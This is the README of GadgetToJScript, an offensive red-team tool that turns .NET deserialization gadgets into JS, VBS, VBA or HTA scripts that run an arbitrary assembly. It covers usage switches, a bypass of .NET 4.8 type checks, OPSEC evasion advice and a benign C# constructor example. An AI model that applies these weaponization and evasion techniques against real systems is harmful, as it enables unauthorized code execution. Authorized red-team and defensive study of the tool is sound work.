Description

GadgetToJScript (G2JS) generates .NET serialized gadgets that trigger .NET assembly load/execution when deserialized with BinaryFormatter from JS/VBS/VBA scripts.

The current gadget triggers a call to Activator.CreateInstance() when deserialized by BinaryFormatter from JScript/VBScript/VBA, which means it can be used to execute a .NET assembly of your choice through that assembly's public default constructor.

The tool was created mainly to automate the weaponization of WSH scripts for red team engagements (initial access, lateral movement, persistence). The shellcode loader used for the original PoC has been removed and replaced by an example assembly implemented in the TestAssembly project.

Details:

Usage & Notes:

You can either use the binaries located in the Release folder or build G2JS from source with VS2017 after retargeting the project to .NET 3.5 or 4.x.

-w, --scriptType=js
    Output script type: js, vbs, vba or hta.

-a, --assembly=TestAssembly.dll
    .NET assembly to embed, example: -a C:\Users\userX\Desktop\shellcode_loader.dll (or .exe). Alternatively, pass a C# source file with the -c switch instead.

-c, --csfile=TestAssembly.cs
    C# source file to compile and embed, example: -c C:\Users\userX\Desktop\shellcode_loader.cs. Place your code inside the public default constructor of your class and list any required dependencies with the -d switch.

-d, --references=Example.dll
    Reference assemblies needed to compile the -c source, example: -d System.Windows.Forms.dll, System.dll

-b, --bypass
    Bypass the type-check controls introduced in .NET 4.8. Off by default; enable it (--bypass/-b) when the generated WSH script will run on .NET 4.8 or later. Use this option only with the .NET 4.x build of G2JS.

-e, --encodeType=b64
    Encoding of the gadget inside VBA output: b64 or hex (default b64).

-o, --output=output
    Output file for the generated payload, given without an extension, example: -o C:\Users\userX\Desktop\output

-r, --regfree
    Use registration-free activation of the .NET based COM components; applies to JS/HTA scripts only.

-h, --help
    Show help.
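As an added example, not the project's own TestAssembly and not code from the original page: a C# source file in the form the -c switch expects, where everything that should run on load sits in the public parameterless constructor. The namespace, class name and message text are assumptions; the two -d references it needs follow directly from its using directives.

```csharp
// Added example for the -c switch (illustrative code, not the project's own
// TestAssembly). The namespace, class name and message text are assumptions.
//
// The gadget produced by G2JS ends in Activator.CreateInstance() on the type
// from the embedded assembly, so the only code guaranteed to run is the public,
// parameterless constructor below. A constructor with parameters, an
// internal/private one, or a static Main would never be invoked by that path.
using System;
using System.Diagnostics;      // Process lives in System.dll               -> -d System.dll
using System.Windows.Forms;    // MessageBox lives in System.Windows.Forms.dll -> -d System.Windows.Forms.dll

namespace G2JSExample
{
    public class Payload
    {
        public Payload()
        {
            // Keep the constructor self-contained and exception-free: an unhandled
            // exception thrown here propagates back into the script host
            // (wscript/cscript/mshta or the Office VBA runtime) as a visible error.
            try
            {
                Process host = Process.GetCurrentProcess();
                string info = string.Format("Assembly loaded in {0} (PID {1}), CLR {2}",
                                            host.ProcessName, host.Id, Environment.Version);
                MessageBox.Show(info, "G2JSExample");
            }
            catch (Exception)
            {
                // Intentionally swallowed; see the comment above.
            }
        }
    }
}
```

A matching invocation, with the reference list quoted so it reaches the tool as one argument (an assumption about how to pass it; the page only shows the list comma-separated): G2JS.exe -w js -c C:\Users\userX\Desktop\Payload.cs -d "System.Windows.Forms.dll, System.dll" -o C:\Users\userX\Desktop\payload. Add -r for a registration-free JS/HTA script, and -b only when using the .NET 4.x build against a target running .NET 4.8 or later.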

OPSEC Tip:

Use the .NET 3.5 build of G2JS to generate registration-free JScript/HTA WSH scripts: these still bypass the .NET Framework 4.8+ type checking without first having to disable that mitigation with the first-stage TextFormattingRunProperties gadget. Consider this the better/cleaner bypass for executing reg-free JScript/HTA payloads against .NET 4.8+ environments, since that extra disabling stage (and the -b switch, which only the 4.x build offers) is not needed:

-> fewer IOCs, and the same payload also targets environments running .NET versions between 3.5 and 4.x.

Credits & References

The tool is based on the awesome research/work done by:

Disclaimer

GadgetToJScript should be used for authorized red teaming and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author. Use it on your own networks and/or with the network owner's permission.